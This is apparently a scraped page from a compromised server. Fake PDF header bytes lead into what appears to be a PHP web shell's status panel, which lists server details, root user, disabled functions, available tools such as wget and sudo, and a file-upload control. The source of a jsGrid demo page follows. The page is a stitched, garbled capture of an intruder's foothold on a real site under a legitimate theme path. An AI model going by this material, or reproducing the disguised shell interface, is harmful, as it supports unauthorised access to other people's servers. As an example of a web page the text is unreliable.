%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/water/common/theme/adminlte/plugins/jsgrid/demos/ |
Upload File : |
<!DOCTYPE html> <html> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>jsGrid - Simple jQuery DataGrid - Demos</title> <link rel="stylesheet" type="text/css" href="demos.css" /> <link href='http://fonts.googleapis.com/css?family=Open+Sans:300,600,400' rel='stylesheet' type='text/css'> </head> <body> <div class="navigation"> <h1>jsGrid Demos</h1> <ul> <li><a href="basic.html" target="demo">Basic Scenario</a></li> <li><a href="static-data.html" target="demo">Static Data</a></li> <li><a href="odata-service.html" target="demo">OData Service</a></li> <li><a href="data-manipulation.html" target="demo">Data Manipulation</a></li> <li><a href="validation.html" target="demo">Validation</a></li> <li><a href="sorting.html" target="demo">Sorting</a></li> <li><a href="loading-by-page.html" target="demo">Loading by Page</a></li> <li><a href="custom-view.html" target="demo">Custom View</a></li> <li><a href="custom-row-renderer.html" target="demo">Custom Row Renderer</a></li> <li><a href="external-pager.html" target="demo">External Pager</a></li> <li><a href="custom-grid-field.html" target="demo">Custom Grid Field</a></li> <li><a href="localization.html" target="demo">Localization</a></li> </ul> </div> <div class="demo-frame"> <iframe name="demo" src="basic.html"></iframe> </div> </body> </html>